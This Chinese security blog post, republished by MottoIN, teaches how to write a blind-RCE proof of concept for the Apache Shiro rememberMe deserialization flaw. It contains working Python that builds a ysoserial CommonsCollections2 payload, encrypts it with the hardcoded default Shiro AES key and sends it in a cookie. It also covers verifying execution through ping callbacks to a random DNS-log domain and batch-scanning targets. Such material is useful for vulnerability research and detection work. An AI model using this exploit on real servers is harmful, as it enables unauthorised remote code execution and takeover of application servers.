猫头鹰
信安舆情早知道

无回显命令执行PoC编写方法(Apache Shiro Java反序列化)

概要

前段时间Mottoin发布了《Apache Shiro Java 反序列化漏洞分析》的文章

Apache Shiro 是 Apache 软件基金会的顶级项目,在 Java 应用中首选的授权验证、授权、密码学和会话管理框架。

近日 Apache Shiro 的 JIRA 中提到 Shrio 中的 Cookie 管理存在安全问题,在场景合适的情况下,攻击者可以通过控制本地的Cookie 内容导致 Getshell ,最终获取应用服务器控制权限。

今天就讲讲Apache Shiro Java反序列化无回显命令执行PoC编写方法

无回显

命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。

验证方法

针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。

该方法可行,不过缺陷有以下几点:

  • 修改了目标机的文件系统
  • 不具有通用性,如windows没有nc、linux没有wget的情况。
  • 涉及到TCP数据传输,执行速度慢

一种更好的方式是使用dns日志来判断命令是否执行,流程如下:

  1. 生成一个特殊的域名,如 1dsa3r3.shiro.server.com
  2. 构造payload让目标机执行 ping 1dsa3r3.shiro.server.com
  3. 登录dns服务后台,如果后台记录了该域名的dns查询记录,即证明目标存在命令执行。

这种方法首先适应了win/unix系统,二者均自带ping命令。而且执行DNS的速度要快于TCP。

Tips

  • 使用ping命令的时候有个坑,大部分linux系统执行ping xxxx时候会一直ping下去,而不是win里面执行4次之后退出。
  • 解决方案:使用 ping -n 3 xxx.com || ping -c 3 xxx.com 可以解决该问题并保证兼容性。
  • 实际情况中会遇到很多入口与出口不同的情况,即我们向主机A发送payload,但是主机B执行了我们的ping命令。这时我们dns日志中的IP与A的IP无法匹配,就会造成漏报。
  • 解决方案:为每次验证生成独立、随机的域名,如[random].shiro.xxx.com,在[random]处使用10位随机字符或者递增的数字。这样只要以该域名为准查找日志,即可同时匹配到入口和出口主机IP。

PoC示例

以Apache Shiro Java反序列化远程命令执行漏洞为例。

Knownsec 404发出的分析文章:

https://www.seebug.org/vuldb/ssvid-92180

完整PoC代码

https://github.com/Xyntax/POC-T/blob/master/script/shiro-deserial-rce.py

主函数

  • 调用cloudeye接口,设置一个以shiro 为特征组的随机域名,即:[random].shiro.user.dnslog.info
  • 将该域名加入目标机执行的ping命令
  • 使用ping命令生成反序列化payload
  • requests以GET请求的Cookie字段发送payload
  • 调用Cloudeye接口查看dns日志,在日志中匹配之前构造的域名
  • 如果访问记录存在,在记录中匹配出口IP
  • 返回入口IP和出口IP
from plugin.cloudeye import CloudEye

def poc(url):
 target = 'http://' + url if '://' not in url else url
 try:
 cloudeye = CloudEye()
 domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组
 rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码
 payload = generator(rce_command, JAR_FILE) # 生成payload
 requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求

dnslog = cloudeye.getDnsRecord(delay=1)
 if domain in dnslog:
 msg = url
 for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip
 msg += ' - ' + each
 return msg

except Exception, e:
 pass
 return False

Payload生成

生成payload的原理在上面链接文章有分析和相应代码,稍加修改,需传入要目标机执行的命令和本地jar的位置:

def generator(command, fp):
 if not os.path.exists(fp):
 raise Exception('jar file not found!')
 popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections2', command],
 stdout=subprocess.PIPE)
 BS = AES.block_size
 pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
 key = "kPH+bIxk5D2deZiIxcaaaA=="
 mode = AES.MODE_CBC
 iv = uuid.uuid4().bytes
 encryptor = AES.new(base64.b64decode(key), mode, iv)
 file_body = pad(popen.stdout.read())
 base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
 return base64_ciphertext

CloudEye接口

简单写了个CloudEye功能接口,用于生成域名和获取dns/Apache日志,整合在PoC框架中,使用前需要配置。

https://github.com/Xyntax/POC-T/blob/master/plugin/cloudeye.py

运行效果

批量验证:

20160804173138084

CloudEye日志:

CLOUDEYE

 

*来源:乐枕的家  作者:Xyntax  Mottoin小编整理发布

转载请注明来自MottoIN,未经允许不得转载!MottoIN » 无回显命令执行PoC编写方法(Apache Shiro Java反序列化)

分享到:更多 ()

评论 1

评论前必须登录!

 

MottoIN 换一个角度看安全

寻求报道联系我们